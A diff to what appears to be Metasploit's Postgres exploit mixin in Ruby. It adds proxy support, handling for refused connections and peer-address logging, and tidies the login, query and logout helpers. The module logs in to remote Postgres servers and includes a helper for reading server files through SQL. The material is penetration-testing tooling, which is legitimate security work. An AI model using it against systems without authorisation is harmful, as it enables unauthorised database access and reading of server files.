@@ -12,7 +12,9 @@ module Exploit::Remote::Postgres
 
   require 'postgres_msf'
   require 'base64'
+  require 'metasploit/framework/tcp/client'
   include Msf::Db::PostgresPR
+  include Exploit::Remote::Tcp
 
   # @!attribute [rw] postgres_conn
   #   @return [::Msf::Db::PostgresPR::Connection]
@@ -94,15 +96,16 @@ module Exploit::Remote::Postgres
     password = opts[:password] || datastore['PASSWORD']
     ip = opts[:server]         || datastore['RHOST']
     port = opts[:port]         || datastore['RPORT']
+    proxies = opts[:proxies]   || datastore['Proxies']
     uri = "tcp://#{ip}:#{port}"
 
     if Rex::Socket.is_ipv6?(ip)
       uri = "tcp://[#{ip}]:#{port}"
     end
 
-    verbose = opts[:verbose]   || datastore['VERBOSE']
+    verbose = opts[:verbose] || datastore['VERBOSE']
     begin
-      self.postgres_conn = Connection.new(db,username,password,uri)
+      self.postgres_conn = Connection.new(db,username,password,uri,proxies)
     rescue RuntimeError => e
       case e.to_s.split("\t")[1]
       when "C3D000"
@@ -115,9 +118,12 @@ module Exploit::Remote::Postgres
         print_error "#{ip}:#{port} Postgres - Error: #{e.inspect}" if verbose
         return :error
       end
+    rescue ::Rex::ConnectionRefused => e
+      print_error "#{ip}:#{port} Postgres - Connection Refused: #{e}" if verbose
+      return :connection_refused
     end
     if self.postgres_conn
-      print_good "#{ip}:#{port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
+      print_good "#{self.postgres_conn.peerhost}:#{self.postgres_conn.peerport} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
       return :connected
     end
   end
@@ -126,14 +132,15 @@ module Exploit::Remote::Postgres
   #
   # @return [void]
   def postgres_logout
-    ip = datastore['RHOST']
-    port = datastore['RPORT']
+    ip = self.postgres_conn.peerhost
+    port = self.postgres_conn.peerport
     verbose = datastore['VERBOSE']
+
     if self.postgres_conn
       self.postgres_conn.close if(self.postgres_conn.kind_of?(Connection) && self.postgres_conn.instance_variable_get("@conn"))
       self.postgres_conn = nil
+      print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
     end
-    print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
   end
 
   # If not currently connected, attempt to connect. If an
@@ -144,15 +151,16 @@ module Exploit::Remote::Postgres
   # @param doprint [Boolean] Whether the result should be printed
   # @return [Hash]
   def postgres_query(sql=nil,doprint=false)
-    ip = datastore['RHOST']
-    port = datastore['RPORT']
-    postgres_login unless self.postgres_conn
     unless self.postgres_conn
-      return {:conn_error => true}
+      result = postgres_login
+      unless result == :connected
+        return { conn_error: result }
+      end
     end
+
     if self.postgres_conn
       sql ||= datastore['SQL']
-      vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
+      vprint_status "#{self.postgres_conn.peerhost}:#{self.postgres_conn.peerport} Postgres - querying with '#{sql}'"
       begin
         resp = self.postgres_conn.query(sql)
       rescue RuntimeError => e
@@ -186,12 +194,11 @@ module Exploit::Remote::Postgres
   # Otherwise, create a rowset using Rex::Text::Table (if there's
   # more than 0 rows) and return :complete.
   def postgres_print_reply(resp=nil,sql=nil)
-    ip = datastore['RHOST']
-    port = datastore['RPORT']
     verbose = datastore['VERBOSE']
     return :error unless resp.kind_of? Connection::Result
+
     if resp.rows and resp.fields
-      print_status "#{ip}:#{port} Rows Returned: #{resp.rows.size}" if verbose
+      print_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Rows Returned: #{resp.rows.size}" if verbose
       if resp.rows.size > 0
         tbl = Rex::Text::Table.new(
           'Indent' => 4,
@@ -344,7 +351,7 @@ module Exploit::Remote::Postgres
   def postgres_read_textfile(filename)
     # Check for temp table creation privs first.
     unless postgres_has_database_privilege('TEMP')
-      return({:sql_error => "Insufficent privileges for #{datastore['USERNAME']} on #{datastore['DATABASE']}"})
+      return({:sql_error => "Insufficient privileges for #{datastore['USERNAME']} on #{datastore['DATABASE']}"})
     end
 
     temp_table_name = Rex::Text.rand_text_alpha(rand(10)+6)
